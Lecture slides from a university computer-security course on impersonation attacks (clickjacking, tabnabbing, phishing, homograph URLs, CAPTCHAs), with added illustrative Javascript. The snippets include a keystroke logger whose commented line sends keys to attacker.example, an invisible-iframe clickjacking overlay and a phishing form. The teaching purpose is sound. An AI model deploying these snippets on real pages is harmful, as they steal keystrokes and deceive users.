SLIDE 1

Impersonation

CS 161: Computer Security

Prof. Vern Paxson

TAs: Jethro Beekman, Mobin Javed, Antonio Lupher, Paul Pearce & Matthias Vallentin

http://inst.eecs.berkeley.edu/~cs161/

March 5, 2013

SLIDE 2

Goals For Today

  • Web “driveby” attacks
  • A broad look at the problem of impersonation
    – Users not interacting with what they think they are
      • Clickjacking
      • Phishing
      • Other deceptive frauds
    – Servers attempting to tell “Is this ‘user’ really a human?”
      • CAPTCHAs
  • With an emphasis on conceptual defenses
SLIDE 3

Dynamic Web Pages

  • Rather than static HTML, web pages can be expressed as a program, say written in Javascript:

    <title>Javascript demo page</title>
    <font size=30>
    Hello, <b>
    <script>
    var a = 1;
    var b = 2;
    document.write("world: ", a+b, "</b>");
    </script>

Threats? Or what else? Java, Flash, Active-X, PDF …

SLIDE 4

Drive-By Downloads

Drive-By download = an attack that infects your system just by you visiting a (malicious) web page. You are now 0wnd!

SLIDE 5 – SLIDE 11
SLIDE 12

Defenses Against Driveby Attacks

  • Sandboxing: rich content (PDF, Flash, …) runs in a constrained environment
    – Implements Least Privilege
  • Disable unneeded functionality
    – Excessive featurism kills!
    – But not always practical
  • Patching / autoupdate
    – Still a race, and can be disruptive
  • Control exposure to untrusted sites
    – E.g., Google Safe Browsing: dynamically updated list of malware & phishing sites
    – Browser warns on any access …

SLIDE 13

Misleading Users

  • Browser assumes clicks & keystrokes = clear indication of what the user wants to do
    – Constitutes part of the user’s trusted path
  • Attacker can meddle with the integrity of this relationship in all sorts of ways …

SLIDE 14
SLIDE 15

Stealing Keystrokes (demo)

SLIDE 16

Misleading Users

  • Browser assumes clicks & keystrokes = clear indication of what the user wants to do
    – Constitutes part of the user’s trusted path
  • Attacker can meddle with the integrity of this relationship in all sorts of ways …
  • Especially, recall the power of Javascript!
    – Alter page contents (dynamically)
    – Track events (mouse clicks, motion, keystrokes)
    – Read/set cookies
    – Issue web requests, read replies
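The event-tracking item above is the basis of the keystroke-stealing demo that follows. A minimal sketch (my illustration, not the lecture's demo code; the attacker URL is hypothetical) of how a page's script can capture keystrokes:

```javascript
// Keystrokes captured so far
var stolen = [];

// Handler written as a plain function so the logic can also be
// exercised outside a browser
function recordKey(evt) {
  stolen.push(evt.key);  // evt.key is the standard KeyboardEvent property
}

// In a real browser, the malicious script would register the handler
// and later exfiltrate, e.g. via an image request:
if (typeof document !== "undefined") {
  document.addEventListener("keydown", recordKey);
  // new Image().src = "https://attacker.example/log?k=" +
  //                   encodeURIComponent(stolen.join(""));
}

// Simulating two keystrokes:
recordKey({ key: "h" });
recordKey({ key: "i" });
console.log(stolen.join(""));  // "hi"
```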

SLIDE 17

From Clickjacking: Attacks and Defenses, by Lin-Shung Huang et al, Carnegie Mellon University / Microsoft Research

Using JS to Steal Facebook Likes

  • Bait-and-switch (e.g., a “Claim your FREE iPad” button)
  • Note: many of these attacks are similar to TOCTTOU (Time of Check to Time of Use) vulnerabilities

SLIDE 18


UI Subversion: Clickjacking

  • An attack application (script) compromises the context integrity of another application’s User Interface when the user acts on the UI:
    1. Target checked
    2. Initiate click
    3. Target clicked

Temporal integrity:
  Target clicked = Target checked
  Pointer clicked = Pointer checked

Visual integrity:
  Target is visible
  Pointer is visible

Context integrity consists of visual integrity + temporal integrity

SLIDE 19


Compromise visual integrity – target

  • Hiding the target
  • Partial overlays

[Screenshot: “Click” button; “$0.15” shown twice]
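The hiding-the-target trick can be sketched in a few lines (my illustration, not from the slides; the victim URL is hypothetical): the victim page is loaded in a nearly invisible iframe stacked above a tempting decoy button, so a click on the decoy actually lands on the framed site. The style is computed as data so the logic can be checked outside a browser.

```javascript
// Build the CSS for an almost fully transparent overlay frame
function overlayStyle(x, y) {
  return "position:absolute; top:" + y + "px; left:" + x + "px; " +
         "width:300px; height:200px; opacity:0.0001; z-index:2;";
}

if (typeof document !== "undefined") {
  var frame = document.createElement("iframe");
  frame.src = "https://victim.example/like";   // hypothetical victim page
  frame.style.cssText = overlayStyle(40, 60);
  document.body.appendChild(frame);            // sits above the decoy button
}

console.log(overlayStyle(40, 60).indexOf("opacity:0.0001") >= 0);  // true
```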

SLIDE 20


Compromise visual integrity – pointer

  • Manipulating cursor feedback

[Screenshot: “Claim your FREE iPad” bait button]
SLIDE 21


Clickjacking to Access the User’s Webcam

[Screenshot: fake cursor shown alongside the real cursor]

SLIDE 22

Some Clickjacking Defenses

  • Require confirmation for actions (annoys users)
  • Frame-busting: Web site ensures that its “vulnerable” pages can’t be included as a frame inside another browser frame
    – So user can’t be looking at it with something invisible overlaid on top …
    – … nor have the site invisible above something else

SLIDE 23

Attacker implements this by placing Twitter’s page in a “Frame” inside their own page. Otherwise they wouldn’t overlap.

SLIDE 24

Some Clickjacking Defenses

  • Require confirmation for actions (annoys users)
  • Frame-busting: Web site ensures that its “vulnerable” pages can’t be included as a frame inside another browser frame
    – So user can’t be looking at it with something invisible overlaid on top …
    – … nor have the site invisible above something else
  • Conceptually implemented with Javascript like:

    if (top.location != self.location)
        top.location = self.location;

    (Note: actually quite tricky to get this right!)

  • Current research considers more general approach …
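The “tricky to get this right” caveat is earned: a hostile parent page can suppress a naive frame-busting redirect (e.g., via iframe sandboxing or unload-handler tricks). A commonly described hardened pattern, sketched here under my own assumptions rather than as the lecture's code, hides the page by default and reveals it only once the check confirms the page is top-level:

```javascript
// Pure decision helper so the logic can be tested outside a browser
function isFramed(topHref, selfHref) {
  return topHref !== selfHref;
}

if (typeof document !== "undefined") {
  // Assumes the page ships with <style>body { display: none; }</style>
  if (!isFramed(top.location.href, self.location.href)) {
    document.body.style.display = "block";   // safe: not framed, show page
  } else {
    top.location = self.location;            // attempt to bust out of frame
  }
}

console.log(isFramed("https://attacker.example/", "https://site.example/")); // true
console.log(isFramed("https://site.example/", "https://site.example/"));     // false
```

In practice sites also declare their framing policy server-side with the X-Frame-Options response header rather than relying on script alone.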
SLIDE 25


InContext Defense (Research)

  • A set of techniques to ensure context integrity for user actions
  • Server opt-in approach
    – Let websites indicate their sensitive UIs
    – Let browsers enforce context integrity when users act on the sensitive UIs

[Screenshot: attacker.com example]

SLIDE 26


Ensuring visual integrity of pointer

  • Remove cursor customization
    – Attack success: 43% -> 16%

SLIDE 27


Ensuring visual integrity of pointer

  • Freeze screen around target on pointer entry
    – Attack success: 43% -> 15%
    – Attack success (margin=10px): 12%
    – Attack success (margin=20px): 4% (baseline: 5%)

[Screenshots: margin=10px and margin=20px]

SLIDE 28


Ensuring visual integrity of pointer

  • Lightbox effect around target on pointer entry
    – Attack success (freezing + lightbox): 2%

SLIDE 29


Enforcing temporal integrity

  • UI delay: after visual changes on target or pointer, invalidate clicks for X ms
    – Attack success (delay=250ms): 47% -> 2% (2/91)
    – Attack success (delay=500ms): 1% (1/89)
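The UI-delay idea can be sketched in a few lines (my illustration of the mechanism described above, not code from the InContext paper; the 500 ms threshold is just the example value from the slide): a click is honored only if enough time has passed since the last visual change.

```javascript
var DELAY_MS = 500;        // example threshold from the slide's experiment
var lastVisualChange = 0;  // timestamp of last change to target/pointer

// Called whenever the target or pointer changes appearance
function noteVisualChange(nowMs) {
  lastVisualChange = nowMs;
}

// A click is only valid once DELAY_MS has elapsed since the last change
function clickIsValid(nowMs) {
  return nowMs - lastVisualChange >= DELAY_MS;
}

noteVisualChange(1000);
console.log(clickIsValid(1200));  // false: only 200 ms after the change
console.log(clickIsValid(1600));  // true: 600 ms after the change
```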

SLIDE 30


Enforcing temporal integrity

  • Pointer re-entry: after visual changes on target, invalidate clicks until pointer re-enters target
    – Attack success: 0% (0/88)

SLIDE 31

Other Forms of UI Sneakiness

  • Along with stealing events, attackers can use the power of Javascript customization / dynamic changes to mess with the userʼs mind …
  • For example, the user may not be paying sufficient attention ... (demo)
    – Tabnabbing
  • Or they might find themselves living in The Matrix …
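The tabnabbing trick mentioned above can be sketched as follows (my illustration, not the lecture's demo; the page titles are made up): an innocuous-looking page waits until its tab loses focus, then rewrites its title, favicon, and content to resemble a login page, hoping the user mistakes it for a tab they left open.

```javascript
// Fake page state stands in for document.title / the DOM, so the
// morphing logic can be exercised outside a browser
var page = { title: "Totally Boring Article", looksLike: "article" };

function onTabBlurred() {
  // User looked away: morph into a fake login page
  page.title = "Gmail: Email from Google";
  page.looksLike = "login-form";
}

// In a real browser this would be wired up roughly as:
// window.addEventListener("blur", onTabBlurred);
// ...with document.title, the favicon, and the DOM mutated in the handler.

onTabBlurred();           // simulate the user switching to another tab
console.log(page.title);  // "Gmail: Email from Google"
```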

SLIDE 32

“Browser in Browser”

Apparent browser is just a fully interactive image generated by Javascript running in the real browser!

SLIDE 33

5 Minute Break

Questions Before We Proceed?

SLIDE 34

Phishing

SLIDE 35

<form action="http://bit.bg/a/paypal.php" method="post" name=Date>

SLIDE 36 – SLIDE 41
SLIDE 42

The Problem of Phishing

  • Arises due to mismatch between reality & user’s:
    – Perception of how to assess legitimacy
    – Mental model of what attackers can control
      • Both Email and Web
  • Coupled with:
    – Deficiencies in how web sites authenticate
      • In particular, “replayable” authentication that is vulnerable to theft
  • How can we tell when weʼre being phished?
SLIDE 43 – SLIDE 44
SLIDE 45

Check the URL before clicking?

    <a href="http://www.ebay.com/"
       onclick="location='http://hackrz.com/'">

SLIDE 46
SLIDE 47

Exploits a misfeature in IE that interprets a number here as a 32-bit IP address
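The misfeature works because an IPv4 address a.b.c.d is just the 32-bit number a·2²⁴ + b·2¹⁶ + c·2⁸ + d, so a URL can name the host by that single decimal number and hide the familiar dotted form. A small illustration of the arithmetic (mine, not from the slides):

```javascript
// Convert a dotted-quad IPv4 address to its single 32-bit decimal form
function ipToDecimal(ip) {
  var parts = ip.split(".").map(Number);
  // ">>> 0" forces an unsigned 32-bit result in Javascript
  return ((parts[0] << 24) | (parts[1] << 16) | (parts[2] << 8) | parts[3]) >>> 0;
}

// http://3232235777/ names the same host as http://192.168.1.1/
// in parsers that accept the decimal form
console.log(ipToDecimal("192.168.1.1"));  // 3232235777
```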

SLIDE 48

Check the URL in address bar?

SLIDE 49 – SLIDE 50
SLIDE 51

Homograph Attacks

  • International domain names can use international character set
    – E.g., Chinese contains characters that look like / . ? =
  • Attack: Legitimately register var.cn …
  • … buy legitimate set of HTTPS certificates for it …
  • … and then create a subdomain:

    www.pnc.com⁄webapp⁄unsec⁄homepage.var.cn
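The “slashes” in that hostname are not the ASCII `/` but a lookalike Unicode character (fraction slash, U+2044), so the whole string is a single label under var.cn rather than a path on www.pnc.com. A quick check of the distinction (my illustration):

```javascript
var realSlash = "/";        // U+002F SOLIDUS: separates path components
var fakeSlash = "\u2044";   // U+2044 FRACTION SLASH: visually similar,
                            // but legal inside a domain label

console.log(realSlash === fakeSlash);               // false
console.log(fakeSlash.charCodeAt(0).toString(16));  // "2044"
```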

SLIDE 52

Check for padlock?

SLIDE 53
SLIDE 54

Add a clever favicon with a picture of a padlock

SLIDE 55

Check for “green glow” in address bar?

SLIDE 56

Check for everything?

SLIDE 57

“Browser in Browser”

SLIDE 58

“Spear Phishing”

Targeted phishing that includes details that seemingly must mean it’s legitimate

SLIDE 59

Yep, this is itself a spear-phishing attack!

SLIDE 60

Sophisticated phishing

  • Context-aware phishing – 10% of users fooled
    – Spoofed email includes info related to a recent eBay transaction/listing/purchase
  • Social phishing – 70% of users fooled
    – Send spoofed email appearing to be from one of the victim’s friends (inferred using social networks)
  • West Point experiment
    – Cadets received a spoofed email near end of semester: “There was a problem with your last grade report; click here to resolve it.” 80% clicked.

SLIDE 61

Why does phishing work?

  • Because users are stupid?
SLIDE 62

Why does phishing work?

  • User mental model vs. reality
    – Browser security model too hard to understand!
  • The easy path is insecure; the secure path takes extra effort
  • Risks are rare
  • Users tend not to suspect malice; they find benign interpretations and have been acclimated to failure
  • Psychology: people prefer to gamble for a chance of no loss rather than accept a sure loss
SLIDE 63

CAPTCHAs

SLIDE 64
SLIDE 65

CAPTCHAs

  • Reverse Turing Test: present “user” a challenge that’s easy for a human to solve, hard for a program to solve
  • One common approach: distorted text that’s difficult for character-recognition algorithms to decipher

SLIDE 66

Problems?

SLIDE 67
SLIDE 68

Issues with CAPTCHAs

  • Inevitable arms race: as solving algorithms get better, defense erodes, or gets harder for humans

SLIDE 69
SLIDE 70

Issues with CAPTCHAs

  • Inevitable arms race: as solving algorithms get better, defense erodes, or gets harder for humans
  • Accessibility: not all humans can see!
  • Granularity: not all bots are bad! (e.g., crawlers)

SLIDE 71

Issues with CAPTCHAs, con’t

  • If generating a CAPTCHA is somewhat expensive, the mechanism itself is a DoS vulnerability

SLIDE 72
SLIDE 73

Issues with CAPTCHAs, con’t

  • If generating a CAPTCHA is somewhat expensive, the mechanism itself is a DoS vulnerability
  • Final problem: CAPTCHAs are inherently vulnerable to outsourcing attacks
    – Attacker gets real humans to solve them

SLIDE 74 – SLIDE 76